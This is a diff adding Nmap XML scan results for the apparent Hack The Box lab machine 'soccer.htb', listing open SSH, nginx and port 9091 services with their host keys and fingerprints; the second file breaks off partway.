+<!-- Nmap 7.93 scan initiated Fri Jan 27 10:41:32 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -p- -oN /home/kali/htb/soccer/results/scans/_full_tcp_nmap.txt -oX /home/kali/htb/soccer/results/scans/xml/_full_tcp_nmap.xml 10.10.11.194 -->
+<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -p- -oN /home/kali/htb/soccer/results/scans/_full_tcp_nmap.txt -oX /home/kali/htb/soccer/results/scans/xml/_full_tcp_nmap.xml 10.10.11.194" start="1674812492" startstr="Fri Jan 27 10:41:32 2023" version="7.93" xmloutputversion="1.05">
+<scaninfo type="connect" protocol="tcp" numservices="65535" services="1-65535"/>
+<verbose level="2"/>
+<debugging level="0"/>
+<taskbegin task="NSE" time="1674812492"/>
+<taskend task="NSE" time="1674812492"/>
+<taskbegin task="NSE" time="1674812492"/>
+<taskend task="NSE" time="1674812492"/>
+<taskbegin task="NSE" time="1674812492"/>
+<taskend task="NSE" time="1674812492"/>
+<taskbegin task="Connect Scan" time="1674812492"/>
+<taskend task="Connect Scan" time="1674812499" extrainfo="65535 total ports"/>
+<taskbegin task="Service scan" time="1674812500"/>
+<taskend task="Service scan" time="1674812541" extrainfo="3 services on 1 host"/>
+<taskbegin task="NSE" time="1674812541"/>
+<taskend task="NSE" time="1674812542"/>
+<taskbegin task="NSE" time="1674812542"/>
+<taskend task="NSE" time="1674812542"/>
+<taskbegin task="NSE" time="1674812542"/>
+<taskend task="NSE" time="1674812542"/>
+<host starttime="1674812492" endtime="1674812542"><status state="up" reason="user-set" reason_ttl="0"/>
+<address addr="10.10.11.194" addrtype="ipv4"/>
+<hostnames>
+<hostname name="soccer.htb" type="PTR"/>
+</hostnames>
+<ports><extraports state="closed" count="65532">
+<extrareasons reason="conn-refused" count="65532" proto="tcp" ports="1-21,23-79,81-9090,9092-65535"/>
+</extraports>
+<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh" product="OpenSSH" version="8.2p1 Ubuntu 4ubuntu0.5" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.2p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa;  3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)&#xa;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChXu/2AxokRA9pcTIQx6HKyiO0odku5KmUpklDRNG+9sa6olMd4dSBq1d0rGtsO2rNJRLQUczml6+N5DcCasAZUShDrMnitsRvG54x8GrJyW4nIx4HOfXRTsNqImBadIJtvIww1L7H1DPzMZYJZj/oOwQHXvp85a2hMqMmoqsljtS/jO3tk7NUKA/8D5KuekSmw8m1pPEGybAZxlAYGu3KbasN66jmhf0ReHg3Vjx9e8FbHr3ksc/MimSMfRq0lIo5fJ7QAnbttM5ktuQqzvVjJmZ0+aL7ZeVewTXLmtkOxX9E5ldihtUFj8C6cQroX69LaaN/AXoEZWl/v1LWE5Qo1DEPrv7A6mIVZvWIM8/AqLpP8JWgAQevOtby5mpmhSxYXUgyii5xRAnvDWwkbwxhKcBIzVy4x5TXinVR7FrrwvKmNAG2t4lpDgmryBZ0YSgxgSAcHIBOglugehGZRHJC9C273hs44EToGCrHBY8n2flJe7OgbjEL8Il3SpfUEF0=&#xa;  256 dfd6a39f68269dfc7c6a0c29e961f00c (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIy3gWUPD+EqFcmc0ngWeRLfCr68+uiuM59j9zrtLNRcLJSTJmlHUdcq25/esgeZkyQ0mr2RZ5gozpBd5yzpdzk=&#xa;  256 5797565def793c2fcbdb35fff17c615c (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ2Pj1mZ0q8u/E8K49Gezm3jguM3d8VyAYsX0QyaN6H/"><table>
+<elem key="fingerprint">ad0d84a3fdcc98a478fef94915dae16d</elem>
+<elem key="key">AAAAB3NzaC1yc2EAAAADAQABAAABgQChXu/2AxokRA9pcTIQx6HKyiO0odku5KmUpklDRNG+9sa6olMd4dSBq1d0rGtsO2rNJRLQUczml6+N5DcCasAZUShDrMnitsRvG54x8GrJyW4nIx4HOfXRTsNqImBadIJtvIww1L7H1DPzMZYJZj/oOwQHXvp85a2hMqMmoqsljtS/jO3tk7NUKA/8D5KuekSmw8m1pPEGybAZxlAYGu3KbasN66jmhf0ReHg3Vjx9e8FbHr3ksc/MimSMfRq0lIo5fJ7QAnbttM5ktuQqzvVjJmZ0+aL7ZeVewTXLmtkOxX9E5ldihtUFj8C6cQroX69LaaN/AXoEZWl/v1LWE5Qo1DEPrv7A6mIVZvWIM8/AqLpP8JWgAQevOtby5mpmhSxYXUgyii5xRAnvDWwkbwxhKcBIzVy4x5TXinVR7FrrwvKmNAG2t4lpDgmryBZ0YSgxgSAcHIBOglugehGZRHJC9C273hs44EToGCrHBY8n2flJe7OgbjEL8Il3SpfUEF0=</elem>
+<elem key="bits">3072</elem>
+<elem key="type">ssh-rsa</elem>
+</table>
+<table>
+<elem key="fingerprint">dfd6a39f68269dfc7c6a0c29e961f00c</elem>
+<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIy3gWUPD+EqFcmc0ngWeRLfCr68+uiuM59j9zrtLNRcLJSTJmlHUdcq25/esgeZkyQ0mr2RZ5gozpBd5yzpdzk=</elem>
+<elem key="bits">256</elem>
+<elem key="type">ecdsa-sha2-nistp256</elem>
+</table>
+<table>
+<elem key="fingerprint">5797565def793c2fcbdb35fff17c615c</elem>
+<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIJ2Pj1mZ0q8u/E8K49Gezm3jguM3d8VyAYsX0QyaN6H/</elem>
+<elem key="bits">256</elem>
+<elem key="type">ssh-ed25519</elem>
+</table>
+</script></port>
+<port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="http" product="nginx" version="1.18.0" extrainfo="Ubuntu" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:igor_sysoev:nginx:1.18.0</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="http-title" output="Soccer - Index "><elem key="title">Soccer - Index </elem>
+</script><script id="http-methods" output="&#xa;  Supported Methods: GET HEAD"><table key="Supported Methods">
+<elem>GET</elem>
+<elem>HEAD</elem>
+</table>
+</script><script id="http-server-header" output="nginx/1.18.0 (Ubuntu)"><elem>nginx/1.18.0 (Ubuntu)</elem>
+</script></port>
+<port protocol="tcp" portid="9091"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="xmltec-xmlmail" servicefp="SF-Port9091-TCP:V=7.93%I=9%D=1/27%Time=63D39C5A%P=x86_64-pc-linux-gnu%r(informix,2F,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n&quot;)%r(drda,2F,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n&quot;)%r(GetRequest,168,&quot;HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Policy:\x20default-src\x20&apos;none&apos;\r\nX-Content-Type-Options:\x20nosniff\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20139\r\nDate:\x20Fri,\x2027\x20Jan\x202023\x2009:41:51\x20GMT\r\nConnection:\x20close\r\n\r\n&lt;!DOCTYPE\x20html&gt;\n&lt;html\x20lang=\&quot;en\&quot;&gt;\n&lt;head&gt;\n&lt;meta\x20charset=\&quot;utf-8\&quot;&gt;\n&lt;title&gt;Error&lt;/title&gt;\n&lt;/head&gt;\n&lt;body&gt;\n&lt;pre&gt;Cannot\x20GET\x20/&lt;/pre&gt;\n&lt;/body&gt;\n&lt;/html&gt;\n&quot;)%r(HTTPOptions,16C,&quot;HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Policy:\x20default-src\x20&apos;none&apos;\r\nX-Content-Type-Options:\x20nosniff\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20143\r\nDate:\x20Fri,\x2027\x20Jan\x202023\x2009:41:52\x20GMT\r\nConnection:\x20close\r\n\r\n&lt;!DOCTYPE\x20html&gt;\n&lt;html\x20lang=\&quot;en\&quot;&gt;\n&lt;head&gt;\n&lt;meta\x20charset=\&quot;utf-8\&quot;&gt;\n&lt;title&gt;Error&lt;/title&gt;\n&lt;/head&gt;\n&lt;body&gt;\n&lt;pre&gt;Cannot\x20OPTIONS\x20/&lt;/pre&gt;\n&lt;/body&gt;\n&lt;/html&gt;\n&quot;)%r(RTSPRequest,16C,&quot;HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Policy:\x20default-src\x20&apos;none&apos;\r\nX-Content-Type-Options:\x20nosniff\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20143\r\nDate:\x20Fri,\x2027\x20Jan\x202023\x2009:41:52\x20GMT\r\nConnection:\x20close\r\n\r\n&lt;!DOCTYPE\x20html&gt;\n&lt;html\x20lang=\&quot;en\&quot;&gt;\n&lt;head&gt;\n&lt;meta\x20charset=\&quot;utf-8\&quot;&gt;\n&lt;title&gt;Error&lt;/title&gt;\n&lt;/head&gt;\n&lt;body&gt;\n&lt;pre&gt;Cannot\x20OPTIONS\x20/&lt;/pre&gt;\n&lt;/body&gt;\n&lt;/html&gt;\n&quot;)%r(RPCCheck,2F,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n&quot;)%r(DNSVersionBindReqTCP,2F,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n&quot;)%r(DNSStatusRequestTCP,2F,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n&quot;)%r(Hello,2F,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n&quot;)%r(Help,2F,&quot;HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n&quot;);" method="table" conf="3"/><script id="fingerprint-strings" output="&#xa;  DNSStatusRequestTCP, DNSVersionBindReqTCP, Hello, Help, RPCCheck, drda, informix: &#xa;    HTTP/1.1 400 Bad Request&#xa;    Connection: close&#xa;  GetRequest: &#xa;    HTTP/1.1 404 Not Found&#xa;    Content-Security-Policy: default-src &apos;none&apos;&#xa;    X-Content-Type-Options: nosniff&#xa;    Content-Type: text/html; charset=utf-8&#xa;    Content-Length: 139&#xa;    Date: Fri, 27 Jan 2023 09:41:51 GMT&#xa;    Connection: close&#xa;    &lt;!DOCTYPE html&gt;&#xa;    &lt;html lang=&quot;en&quot;&gt;&#xa;    &lt;head&gt;&#xa;    &lt;meta charset=&quot;utf-8&quot;&gt;&#xa;    &lt;title&gt;Error&lt;/title&gt;&#xa;    &lt;/head&gt;&#xa;    &lt;body&gt;&#xa;    &lt;pre&gt;Cannot GET /&lt;/pre&gt;&#xa;    &lt;/body&gt;&#xa;    &lt;/html&gt;&#xa;  HTTPOptions, RTSPRequest: &#xa;    HTTP/1.1 404 Not Found&#xa;    Content-Security-Policy: default-src &apos;none&apos;&#xa;    X-Content-Type-Options: nosniff&#xa;    Content-Type: text/html; charset=utf-8&#xa;    Content-Length: 143&#xa;    Date: Fri, 27 Jan 2023 09:41:52 GMT&#xa;    Connection: close&#xa;    &lt;!DOCTYPE html&gt;&#xa;    &lt;html lang=&quot;en&quot;&gt;&#xa;    &lt;head&gt;&#xa;    &lt;meta charset=&quot;utf-8&quot;&gt;&#xa;    &lt;title&gt;Error&lt;/title&gt;&#xa;    &lt;/head&gt;&#xa;    &lt;body&gt;&#xa;    &lt;pre&gt;Cannot OPTIONS /&lt;/pre&gt;&#xa;    &lt;/body&gt;&#xa;    &lt;/html&gt;"><elem key="DNSStatusRequestTCP, DNSVersionBindReqTCP, Hello, Help, RPCCheck, drda, informix">&#xa;    HTTP/1.1 400 Bad Request&#xa;    Connection: close</elem>
+<elem key="GetRequest">&#xa;    HTTP/1.1 404 Not Found&#xa;    Content-Security-Policy: default-src &apos;none&apos;&#xa;    X-Content-Type-Options: nosniff&#xa;    Content-Type: text/html; charset=utf-8&#xa;    Content-Length: 139&#xa;    Date: Fri, 27 Jan 2023 09:41:51 GMT&#xa;    Connection: close&#xa;    &lt;!DOCTYPE html&gt;&#xa;    &lt;html lang=&quot;en&quot;&gt;&#xa;    &lt;head&gt;&#xa;    &lt;meta charset=&quot;utf-8&quot;&gt;&#xa;    &lt;title&gt;Error&lt;/title&gt;&#xa;    &lt;/head&gt;&#xa;    &lt;body&gt;&#xa;    &lt;pre&gt;Cannot GET /&lt;/pre&gt;&#xa;    &lt;/body&gt;&#xa;    &lt;/html&gt;</elem>
+<elem key="HTTPOptions, RTSPRequest">&#xa;    HTTP/1.1 404 Not Found&#xa;    Content-Security-Policy: default-src &apos;none&apos;&#xa;    X-Content-Type-Options: nosniff&#xa;    Content-Type: text/html; charset=utf-8&#xa;    Content-Length: 143&#xa;    Date: Fri, 27 Jan 2023 09:41:52 GMT&#xa;    Connection: close&#xa;    &lt;!DOCTYPE html&gt;&#xa;    &lt;html lang=&quot;en&quot;&gt;&#xa;    &lt;head&gt;&#xa;    &lt;meta charset=&quot;utf-8&quot;&gt;&#xa;    &lt;title&gt;Error&lt;/title&gt;&#xa;    &lt;/head&gt;&#xa;    &lt;body&gt;&#xa;    &lt;pre&gt;Cannot OPTIONS /&lt;/pre&gt;&#xa;    &lt;/body&gt;&#xa;    &lt;/html&gt;</elem>
+</script></port>
+</ports>
+<times srtt="55903" rttvar="34235" to="192843"/>
+</host>
+<taskbegin task="NSE" time="1674812542"/>
+<taskend task="NSE" time="1674812542"/>
+<taskbegin task="NSE" time="1674812542"/>
+<taskend task="NSE" time="1674812542"/>
+<taskbegin task="NSE" time="1674812542"/>
+<taskend task="NSE" time="1674812542"/>
+<runstats><finished time="1674812542" timestr="Fri Jan 27 10:42:22 2023" summary="Nmap done at Fri Jan 27 10:42:22 2023; 1 IP address (1 host up) scanned in 50.63 seconds" elapsed="50.63" exit="success"/><hosts up="1" down="0" total="1"/>
+</runstats>
+</nmaprun>
--- a/HTB/soccer/results/scans/xml/_quick_tcp_nmap.xml
+++ b/HTB/soccer/results/scans/xml/_quick_tcp_nmap.xml
@@ -0,0 +1,74 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE nmaprun>
+<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
+<!-- Nmap 7.93 scan initiated Fri Jan 27 10:41:32 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -oN /home/kali/htb/soccer/results/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/soccer/results/scans/xml/_quick_tcp_nmap.xml 10.10.11.194 -->
+<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -sC -&#45;version-all -A -&#45;osscan-guess -oN /home/kali/htb/soccer/results/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/soccer/results/scans/xml/_quick_tcp_nmap.xml 10.10.11.194" start="1674812492" startstr="Fri Jan 27 10:41:32 2023" version="7.93" xmloutputversion="1.05">
+<scaninfo type="connect" protocol="tcp" numservices="1000" services="1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/>
+<verbose level="2"/>
+<debugging level="0"/>
+<taskbegin task="NSE" time="1674812492"/>
+<taskend task="NSE" time="1674812492"/>
+<taskbegin task="NSE" time="1674812492"/>
+<taskend task="NSE" time="1674812492"/>
+<taskbegin task="NSE" time="1674812492"/>
+<taskend task="NSE" time="1674812492"/>
+<taskbegin task="Connect Scan" time="1674812492"/>
+<taskend task="Connect Scan" time="1674812493" extrainfo="1000 total ports"/>
+<taskbegin task="Service scan" time="1674812493"/>
+<taskend task="Service scan" time="1674812537" extrainfo="3 services on 1 host"/>
+<taskbegin task="NSE" time="1674812537"/>
+<taskend task="NSE" time="1674812538"/>
+<taskbegin task="NSE" time="1674812538"/>
+<taskend task="NSE" time="1674812538"/>
+<taskbegin task="NSE" time="1674812538"/>
+<taskend task="NSE" time="1674812538"/>
+<host starttime="1674812492" endtime="1674812538"><status state="up" reason="user-set" reason_ttl="0"/>
+<address addr="10.10.11.194" addrtype="ipv4"/>
+<hostnames>
+<hostname name="soccer.htb" type="PTR"/>
+</hostnames>
+<ports><extraports state="closed" count="997">
+<extrareasons reason="conn-refused" count="997" proto="tcp" ports="1,3-4,6-7,9,13,17,19-21,23-26,30,32-33,37,42-43,49,53,70,79,81-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389"/>
+</extraports>
+<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh" product="OpenSSH" version="8.2p1 Ubuntu 4ubuntu0.5" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.2p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa;  3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)&#xa;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChXu/2AxokRA9pcTIQx6HKyiO0odku5KmUpklDRNG+9sa6olMd4dSBq1d0rGtsO2rNJRLQUczml6+N5DcCasAZUShDrMnitsRvG54x8GrJyW4nIx4HOfXRTsNqImBadIJtvIww1L7H1DPzMZYJZj/oOwQHXvp85a2hMqMmoqsljtS/jO3tk7NUKA/8D5KuekSmw8m1pPEGybAZxlAYGu3KbasN66jmhf0ReHg3Vjx9e8FbHr3ksc/MimSMfRq0lIo5fJ7QAnbttM5ktuQqzvVjJmZ0+aL7ZeVewTXLmtkOxX9E5ldihtUFj8C6cQroX69LaaN/AXoEZWl/v1LWE5Qo1DEPrv7A6mIVZvWIM8/AqLpP8JWgAQevOtby5mpmhSxYXUgyii5xRAnvDWwkbwxhKcBIzVy4x5TXinVR7FrrwvKmNAG2t4lpDgmryBZ0YSgxgSAcHIBOglugehGZRHJC9C273hs44EToGCrHBY8n2flJe7OgbjEL8Il3SpfUEF0=&#xa;  256 dfd6a39f68269dfc7c6a0c29e961f00c (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIy3gWUPD+EqFcmc0ngWeRLfCr68+uiuM59j9zrtLNRcLJSTJmlHUdcq25/esgeZkyQ0mr2RZ5gozpBd5yzpdzk=&#xa;  256 5797565def793c2fcbdb35fff17c615c (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ2Pj1mZ0q8u/E8K49Gezm3jguM3d8VyAYsX0QyaN6H/"><table>
+<elem key="fingerprint">ad0d84a3fdcc98a478fef94915dae16d</elem>
+<elem key="bits">3072</elem>
+<elem key="type">ssh-rsa</elem>
+<elem key="key">AAAAB3NzaC1yc2EAAAADAQABAAABgQChXu/2AxokRA9pcTIQx6HKyiO0odku5KmUpklDRNG+9sa6olMd4dSBq1d0rGtsO2rNJRLQUczml6+N5DcCasAZUShDrMnitsRvG54x8GrJyW4nIx4HOfXRTsNqImBadIJtvIww1L7H1DPzMZYJZj/oOwQHXvp85a2hMqMmoqsljtS/jO3tk7NUKA/8D5KuekSmw8m1pPEGybAZxlAYGu3KbasN66jmhf0ReHg3Vjx9e8FbHr3ksc/MimSMfRq0lIo5fJ7QAnbttM5ktuQqzvVjJmZ0+aL7ZeVewTXLmtkOxX9E5ldihtUFj8C6cQroX69LaaN/AXoEZWl/v1LWE5Qo1DEPrv7A6mIVZvWIM8/AqLpP8JWgAQevOtby5mpmhSxYXUgyii5xRAnvDWwkbwxhKcBIzVy4x5TXinVR7FrrwvKmNAG2t4lpDgmryBZ0YSgxgSAcHIBOglugehGZRHJC9C273hs44EToGCrHBY8n2flJe7OgbjEL8Il3SpfUEF0=</elem>
+</table>
+<table>
+<elem key="fingerprint">dfd6a39f68269dfc7c6a0c29e961f00c</elem>
+<elem key="bits">256</elem>
+<elem key="type">ecdsa-sha2-nistp256</elem>
+<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIy3gWUPD+EqFcmc0ngWeRLfCr68+uiuM59j9zrtLNRcLJSTJmlHUdcq25/esgeZkyQ0mr2RZ5gozpBd5yzpdzk=</elem>
+</table>
+<table>
+<elem key="fingerprint">5797565def793c2fcbdb35fff17c615c</elem>
+<elem key="bits">256</elem>
+<elem key="type">ssh-ed25519</elem>
+<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIJ2Pj1mZ0q8u/E8K49Gezm3jguM3d8VyAYsX0QyaN6H/</elem>
+</table>
+</script></port>
